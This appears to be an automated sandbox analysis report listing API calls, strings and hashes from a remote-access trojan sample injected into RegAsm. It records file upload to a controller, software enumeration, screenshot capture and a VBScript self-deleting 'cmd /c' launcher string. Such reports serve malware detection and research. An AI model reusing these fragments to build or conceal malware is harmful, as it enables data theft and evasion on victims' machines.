                                                                                                                                                                                          • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?), ref: 0041C24A
                                                                                                                                                                                          • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041C261
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                                                                                                          • String ID: ?
                                                                                                                                                                                          • API String ID: 3941738427-1684325040
                                                                                                                                                                                          • Opcode ID: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                                                                                                                                                          • Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
                                                                                                                                                                                          • Opcode Fuzzy Hash: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                                                                                                                                                          • Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$EnvironmentVariable$_wcschr
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3899193279-0
                                                                                                                                                                                          • Opcode ID: 8496763b0818b5098030034dcc69127a0bf1f152158b2efe3c03734e132739af
                                                                                                                                                                                          • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8496763b0818b5098030034dcc69127a0bf1f152158b2efe3c03734e132739af
                                                                                                                                                                                          • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                                                                                                          • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                                                                                                                          • API String ID: 2490988753-744132762
                                                                                                                                                                                          • Opcode ID: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                                                                                                                                                          • Instruction ID: 3d65f6a93fba2a0b2eac8854c7d2b2934d6e6a161d7d6dc9994b6ec54a408268
                                                                                                                                                                                          • Opcode Fuzzy Hash: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E31C4B1905315A7D7209F65CC84DDF76DCAB84754F004A2AF944A3210D738D985CBAE
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
                                                                                                                                                                                          • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C786
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0041CA50
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseEnumOpen
                                                                                                                                                                                          • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                                                                                                                          • API String ID: 1332880857-3714951968
                                                                                                                                                                                          • Opcode ID: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                                                                                                                                                                          • Instruction ID: 8204223968f620e226549da85b9b34a309c849e8d9bbed411749b7727356edba
                                                                                                                                                                                          • Opcode Fuzzy Hash: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E8133311082459BC325EF11D851EEFB7E8BF94309F10492FB589921A2FF74AE49CA5A
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 0041D67A
                                                                                                                                                                                          • SetForegroundWindow.USER32(?), ref: 0041D683
                                                                                                                                                                                          • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                                                                                                                                                                          • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0041D6F6
                                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 0041D6FC
                                                                                                                                                                                          • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                                                                                                          • String ID: Close
                                                                                                                                                                                          • API String ID: 1657328048-3535843008
                                                                                                                                                                                          • Opcode ID: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                                                                                                                                                          • Instruction ID: ffebe08b42ddc2cad69fc5dc181b4667ce265f065f51bc56e4a7814a85689449
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D213BB1544209FFDF155FA4ED0EAAA3F35EB08302F000125F909951B2D779EDA1EB19
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$Info
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2509303402-0
                                                                                                                                                                                          • Opcode ID: d4b587b978178a04d77a312406460529d21981b93c8e51504b7a0db7e668213d
                                                                                                                                                                                          • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                                                                                                                                                                                          • Opcode Fuzzy Hash: d4b587b978178a04d77a312406460529d21981b93c8e51504b7a0db7e668213d
                                                                                                                                                                                          • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408D1E
                                                                                                                                                                                          • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 00408D88
                                                                                                                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                                          • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FE9
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00409037
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                                                                                                                                          • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                                                                                                                                                          • API String ID: 3086580692-2582957567
                                                                                                                                                                                          • Opcode ID: 1eca58239539986b7f47a22af75df51a2b8eece64db44562e943364f676ba915
                                                                                                                                                                                          • Instruction ID: 3fce176daff91a8ac67d7e00268aa6ddaa8eb0a69c3dc15cdf5b3728eb075172
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1eca58239539986b7f47a22af75df51a2b8eece64db44562e943364f676ba915
                                                                                                                                                                                          • Instruction Fuzzy Hash: CCB1A1316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB8B
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ___free_lconv_mon.LIBCMT ref: 0045138A
                                                                                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                                                                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                                                                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                                                                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                                                                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                                                                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                                                                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                                                                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                                                                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                                                                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                                                                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                                                                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                                                                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                                                                                                                                                                          • _free.LIBCMT ref: 0045137F
                                                                                                                                                                                            • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                                                                                                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                                                                          • _free.LIBCMT ref: 004513A1
                                                                                                                                                                                          • _free.LIBCMT ref: 004513B6
                                                                                                                                                                                          • _free.LIBCMT ref: 004513C1
                                                                                                                                                                                          • _free.LIBCMT ref: 004513E3
                                                                                                                                                                                          • _free.LIBCMT ref: 004513F6
                                                                                                                                                                                          • _free.LIBCMT ref: 00451404
                                                                                                                                                                                          • _free.LIBCMT ref: 0045140F
                                                                                                                                                                                          • _free.LIBCMT ref: 00451447
                                                                                                                                                                                          • _free.LIBCMT ref: 0045144E
                                                                                                                                                                                          • _free.LIBCMT ref: 0045146B
                                                                                                                                                                                          • _free.LIBCMT ref: 00451483
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 161543041-0
                                                                                                                                                                                          • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                                                                                                                          • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                                                                                                                          • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 0041A04A
                                                                                                                                                                                          • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 0041A196
                                                                                                                                                                                          • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                                                                                                          • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                                                                                                                                                                          • API String ID: 489098229-1431523004
                                                                                                                                                                                          • Opcode ID: a9a564c4fa78c27a57715e2126324e45245b8a766e259b72a025c3b0d3967f40
                                                                                                                                                                                          • Instruction ID: 12d64888f2a2aa40a87de1a625a26b3edd7a2139bf4817292c9f8cf1352d8a2d
                                                                                                                                                                                          • Opcode Fuzzy Hash: a9a564c4fa78c27a57715e2126324e45245b8a766e259b72a025c3b0d3967f40
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A517D70A002159ACB14BBB5C8529FD77A9AF54308F40407FF509AB1E2EF7C9D85C799
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                                                                                                            • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                                                                                                                            • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 0041374F
                                                                                                                                                                                            • Part of subcall function 00413733: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00413768
                                                                                                                                                                                            • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                                                                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0040D9FF
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                                                                                                          • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                                                                                                                          • API String ID: 1913171305-3159800282
                                                                                                                                                                                          • Opcode ID: 735363a61d4a6102bdb475cbbee8b2128f37d59f9cf329697b8eb3096c25ea2a
                                                                                                                                                                                          • Instruction ID: 6f299f75ad759bd4c56b3f4cab90e5e1fe41ff60d22e8747b975e3d2bb757992
                                                                                                                                                                                          • Opcode Fuzzy Hash: 735363a61d4a6102bdb475cbbee8b2128f37d59f9cf329697b8eb3096c25ea2a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B4129719001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E8ACA98
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                                          • Opcode ID: eb0df5fda3918316229511e27b327a59e2685e6d7c39cee33e37fcee88581610
                                                                                                                                                                                          • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                                                                                                                                                                                          • Opcode Fuzzy Hash: eb0df5fda3918316229511e27b327a59e2685e6d7c39cee33e37fcee88581610
                                                                                                                                                                                          • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000,?,00455D04,00000000,0000000C), ref: 00455946
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00455D6F
                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00455D76
                                                                                                                                                                                          • GetFileType.KERNEL32(00000000), ref: 00455D82
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00455D8C
                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00455D95
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00455EFF
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00455F31
                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00455F38
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                          • String ID: H
                                                                                                                                                                                          • API String ID: 4237864984-2852464175
                                                                                                                                                                                          • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                                                                                                                                          • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                                                                                                                                          • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                          • String ID: \&G$\&G$`&G
                                                                                                                                                                                          • API String ID: 269201875-253610517
                                                                                                                                                                                          • Opcode ID: 603d38a142dc548eb4b528e84f11e511c21ef1631bb53945c21f85f640c78996
                                                                                                                                                                                          • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                                                                                                                                                                                          • Opcode Fuzzy Hash: 603d38a142dc548eb4b528e84f11e511c21ef1631bb53945c21f85f640c78996
                                                                                                                                                                                          • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: 65535$udp
                                                                                                                                                                                          • API String ID: 0-1267037602
                                                                                                                                                                                          • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                                                                                                                                                          • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                                                                                                                                                                                          • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                                                                                                                                                          • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 0043A926
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 0043A963
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A9A6
                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 0043A9B7
                                                                                                                                                                                          • _free.LIBCMT ref: 0043A9C3
                                                                                                                                                                                          • _free.LIBCMT ref: 0043A9CA
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
